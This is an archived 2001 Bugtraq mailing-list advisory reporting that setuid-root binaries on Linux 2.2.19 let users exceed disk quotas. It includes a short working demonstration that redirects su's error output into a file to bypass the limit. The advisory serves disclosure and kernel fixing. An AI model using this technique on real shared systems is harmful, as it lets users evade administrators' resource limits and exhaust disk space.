7342545 2001-10-22 10:43 +0200  /53 rader/ =?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2001-10-22  17:02  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: linux-kernel@vger.kernel.org
Mottagare: Bugtraq (import) <19533>
Ärende: Overriding qouta limits in Linux kernel
------------------------------------------------------------
From: =?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl>
To: <bugtraq@securityfocus.com>, <linux-kernel@vger.kernel.org>
Message-ID: <Pine.LNX.4.33.0110220947590.29104-100000@lama.supermedia.pl>


Almost any suid binary may be used to create large files overriding
quota limits.

When setuid-root binary inherits file descriptors from user process
it may write to it without respecting the quota restrictions. This is
because suid process has CAP_SYS_RESOURCE effective capability
enabled during writing to the file. Quota does not know anything
about who opened file descriptor and checks current process
privileges only. This is bug in kernel and not in those setuid-root
binaries.

Tested on Linux kernel 2.2.19.

Example:

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6       4      10      10       1      10      10

cliph$perl -e 'print "a"x16384' >>myfile
/vol1: write failed, user disk limit reached.

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp           4096 Oct 22 10:33 myfile

cliph$su $(perl -e 'print "a"x16384') 2>>myfile cliph$ # ^^^ this is
it: su writes error message to fd 2 without limits

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp          20505 Oct 22 10:34 myfile

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6      28*     10      10       2      10      10

(I removed `grace' fields from quota output)

PS: Please include my address in CC as I may be not subscribed to the
list(s).

_________________________________________________________________
 Wojciech Purczyñski | Security Officer | http://cliph.linux.pl/
-----------------------------------------------------------------
 Murphy's law says that there is always one more bug...
          ...but he forgot to mention whether it is exploitable.
(7342545) /=?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <wp@supermedia.pl>/(Ombruten)